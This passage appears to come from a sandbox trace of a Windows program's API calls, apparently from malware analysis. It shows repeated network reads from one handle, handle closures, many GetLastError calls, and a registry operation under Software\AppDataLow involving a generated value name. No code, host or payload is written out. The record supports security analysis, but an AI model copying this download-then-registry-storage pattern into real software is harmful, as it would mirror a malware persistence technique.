	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.576] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.576] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.576] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.619] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0074.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f978, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fcec | out: lpBuffer=0x247f978*, lpdwNumberOfBytesRead=0x247fcec*=0x200) returned 1
	[0075.250] InternetCloseHandle (hInternet=0xcc000c) returned 1
	[0075.250] InternetCloseHandle (hInternet=0xcc0008) returned 1
	[0075.250] InternetCloseHandle (hInternet=0xcc0004) returned 1
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.251] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.252] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20206, lpSecurityAttributes=0x0, phkResult=0x247fcd8, lpdwDisposition=0x0 | out: phkResult=0x247fcd8*=0x238, lpdwDisposition=0x0) returned 0x0
	[0075.252] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_0") returned 10
	[0075.253] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_0") returned 0x2
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
